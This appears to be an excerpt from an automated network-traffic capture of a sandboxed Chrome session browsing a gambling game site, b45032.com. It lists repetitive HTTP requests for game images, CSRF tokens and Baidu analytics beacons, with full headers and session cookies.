XSRF-TOKEN=eyJpdiI6IkszTVZIWUtvZlNxMXg5NldcL25oVnd3PT0iLCJ2YWx1ZSI6IjZMMGpFWWVVNExrbVhyd0F4Z2swUjRFNlJ4cVMwanA4R253ZTlmY0RXY0pNbFhhdXhoK1JCWmljWURyQ0RUV1NMV3E5U1wvbXpERUxCTENWOEpTUGV2Zz09IiwibWFjIjoiNzY3OTIyZTExZDAwMmY3YmU0MTU5NTI2YjYyOWI5NDgwYzEzNzcyZjRhMDU0OGFjMGI0ZTAzNGNhZjNjZDRjNCJ9; vanguard_session=eyJpdiI6InQ0cFpmODU5YzdGRHFEOFdrN3ZYcHc9PSIsInZhbHVlIjoiWEw3YlFST2lQMGRvd1lrYU9YTjlFd3JTREhBOUhxNHVUXC9KdktHNVZKWkhkNCtKNEROdGdsRTFDUzY0YzhCbGR2NHZYZlNGU1AzbU45blBIeW5GYm1RPT0iLCJtYWMiOiJhOGZhMTBhNmYyMGM1MTZmYWUwNmVmYmJhNzBhMWJkYmEyMGZhNDRlZTk0YTQ4MDYxNDg0NzBhZTI1ZjkyZjhhIn0%3D
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/gamekey/1.png?ver=1659683709 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/202_egame_icon.png?1736725718963 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /member/call-request?check=1 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/202Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IkszTVZIWUtvZlNxMXg5NldcL25oVnd3PT0iLCJ2YWx1ZSI6IjZMMGpFWWVVNExrbVhyd0F4Z2swUjRFNlJ4cVMwanA4R253ZTlmY0RXY0pNbFhhdXhoK1JCWmljWURyQ0RUV1NMV3E5U1wvbXpERUxCTENWOEpTUGV2Zz09IiwibWFjIjoiNzY3OTIyZTExZDAwMmY3YmU0MTU5NTI2YjYyOWI5NDgwYzEzNzcyZjRhMDU0OGFjMGI0ZTAzNGNhZjNjZDRjNCJ9; vanguard_session=eyJpdiI6InQ0cFpmODU5YzdGRHFEOFdrN3ZYcHc9PSIsInZhbHVlIjoiWEw3YlFST2lQMGRvd1lrYU9YTjlFd3JTREhBOUhxNHVUXC9KdktHNVZKWkhkNCtKNEROdGdsRTFDUzY0YzhCbGR2NHZYZlNGU1AzbU45blBIeW5GYm1RPT0iLCJtYWMiOiJhOGZhMTBhNmYyMGM1MTZmYWUwNmVmYmJhNzBhMWJkYmEyMGZhNDRlZTk0YTQ4MDYxNDg0NzBhZTI1ZjkyZjhhIn0%3D
Source: global trafficHTTP traffic detected: GET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DDIf-None-Match: 212cb7224b20495fcedcef6081553c65
Source: global trafficHTTP traffic detected: GET /gdcode_1736725716 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IkszTVZIWUtvZlNxMXg5NldcL25oVnd3PT0iLCJ2YWx1ZSI6IjZMMGpFWWVVNExrbVhyd0F4Z2swUjRFNlJ4cVMwanA4R253ZTlmY0RXY0pNbFhhdXhoK1JCWmljWURyQ0RUV1NMV3E5U1wvbXpERUxCTENWOEpTUGV2Zz09IiwibWFjIjoiNzY3OTIyZTExZDAwMmY3YmU0MTU5NTI2YjYyOWI5NDgwYzEzNzcyZjRhMDU0OGFjMGI0ZTAzNGNhZjNjZDRjNCJ9; vanguard_session=eyJpdiI6InQ0cFpmODU5YzdGRHFEOFdrN3ZYcHc9PSIsInZhbHVlIjoiWEw3YlFST2lQMGRvd1lrYU9YTjlFd3JTREhBOUhxNHVUXC9KdktHNVZKWkhkNCtKNEROdGdsRTFDUzY0YzhCbGR2NHZYZlNGU1AzbU45blBIeW5GYm1RPT0iLCJtYWMiOiJhOGZhMTBhNmYyMGM1MTZmYWUwNmVmYmJhNzBhMWJkYmEyMGZhNDRlZTk0YTQ4MDYxNDg0NzBhZTI1ZjkyZjhhIn0%3D
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=202&page=1&cates%5B%5D=801&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IkszTVZIWUtvZlNxMXg5NldcL25oVnd3PT0iLCJ2YWx1ZSI6IjZMMGpFWWVVNExrbVhyd0F4Z2swUjRFNlJ4cVMwanA4R253ZTlmY0RXY0pNbFhhdXhoK1JCWmljWURyQ0RUV1NMV3E5U1wvbXpERUxCTENWOEpTUGV2Zz09IiwibWFjIjoiNzY3OTIyZTExZDAwMmY3YmU0MTU5NTI2YjYyOWI5NDgwYzEzNzcyZjRhMDU0OGFjMGI0ZTAzNGNhZjNjZDRjNCJ9; vanguard_session=eyJpdiI6InQ0cFpmODU5YzdGRHFEOFdrN3ZYcHc9PSIsInZhbHVlIjoiWEw3YlFST2lQMGRvd1lrYU9YTjlFd3JTREhBOUhxNHVUXC9KdktHNVZKWkhkNCtKNEROdGdsRTFDUzY0YzhCbGR2NHZYZlNGU1AzbU45blBIeW5GYm1RPT0iLCJtYWMiOiJhOGZhMTBhNmYyMGM1MTZmYWUwNmVmYmJhNzBhMWJkYmEyMGZhNDRlZTk0YTQ4MDYxNDg0NzBhZTI1ZjkyZjhhIn0%3D
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/yoplay/YP801.png?ver=1664356226 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /csrf HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IkszTVZIWUtvZlNxMXg5NldcL25oVnd3PT0iLCJ2YWx1ZSI6IjZMMGpFWWVVNExrbVhyd0F4Z2swUjRFNlJ4cVMwanA4R253ZTlmY0RXY0pNbFhhdXhoK1JCWmljWURyQ0RUV1NMV3E5U1wvbXpERUxCTENWOEpTUGV2Zz09IiwibWFjIjoiNzY3OTIyZTExZDAwMmY3YmU0MTU5NTI2YjYyOWI5NDgwYzEzNzcyZjRhMDU0OGFjMGI0ZTAzNGNhZjNjZDRjNCJ9; vanguard_session=eyJpdiI6InQ0cFpmODU5YzdGRHFEOFdrN3ZYcHc9PSIsInZhbHVlIjoiWEw3YlFST2lQMGRvd1lrYU9YTjlFd3JTREhBOUhxNHVUXC9KdktHNVZKWkhkNCtKNEROdGdsRTFDUzY0YzhCbGR2NHZYZlNGU1AzbU45blBIeW5GYm1RPT0iLCJtYWMiOiJhOGZhMTBhNmYyMGM1MTZmYWUwNmVmYmJhNzBhMWJkYmEyMGZhNDRlZTk0YTQ4MDYxNDg0NzBhZTI1ZjkyZjhhIn0%3D
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/zhh6mqf3z495a.png?ver=1734681327 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ddodhamgc71gk.png?ver=1733716011 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/o39k3h9o685xq.png?ver=1733369194 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/qqgindypyeboy.png?ver=1733369194 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/gdrbc1kqj7gr4.png?ver=1731898048 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/xkbfobaryz7xs.png?ver=1731898048 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /member/call-request?check=1 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725708; XSRF-TOKEN=eyJpdiI6IjZxSkYzWVkwZHVFMGJcLzB2cEwzTnpRPT0iLCJ2YWx1ZSI6ImtIVXREa05jXC9SUUFJQTJleitwTXRReWRIN3JYTWt2S3JxU1ZWVk5qdExkcFwvS1ByK0Qrb09tZmFrMzFIb05KUFV3MFdxVkZ6aERxb01veHU1eUxMblE9PSIsIm1hYyI6IjY4ZTIzM2JjYTlkNzBmNzIxMmRlZDc2OTA5NzM4OTcwODY0ODhlZGQ0YTJlMDdjODdhMGMwNjY5NDA4NGQyMTYifQ%3D%3D; vanguard_session=eyJpdiI6Ik9weE0wMmNURzJiejB3MGNMRHNabnc9PSIsInZhbHVlIjoiSU5HYktIMjlya05KRjhMYXduaGNTK3hvQUUwRU10MmgrdEZvMHpaK3NCNjF6ZXpRV3VPNkhnbFVcL3VBeitFVHhNVGlLXC85bmJnVWg2dkNPQkdKbzY4Zz09IiwibWFjIjoiYjJmMTc0YzNhYmJkZmY3Mjc4ZGM0YjY4MzE4MDcyYzc4YzM3NmU2ZjAyODNmYmE5MTY1NmY2NjQ2NWM4NmI1OCJ9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/202_egame_icon.png?1736725718963 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/yoplay/YP801.png?ver=1664356226 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&lt=1736725677&rnd=1610693818&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=2&sn=48231&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2Fegame%2F202&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/wpqadzg74mj7y.png?ver=1731292166 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/uft593z8hu17w.png?ver=1727844915 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/zhh6mqf3z495a.png?ver=1734681327 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/fmjyoi4wkifrs.png?ver=1727844915 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/86hskqb38a9ua.png?ver=1722582213 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ao6qfxp1sqamn.png?ver=1722582213 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/qqgindypyeboy.png?ver=1733369194 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/zcw3utgfzk75o.png?ver=1718611710 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ddodhamgc71gk.png?ver=1733716011 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/gdrbc1kqj7gr4.png?ver=1731898048 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/o39k3h9o685xq.png?ver=1733369194 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/xkbfobaryz7xs.png?ver=1731898048 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&lt=1736725677&rnd=1610693818&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=2&sn=48231&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2Fegame%2F202&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/soojfuqnaxycn.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
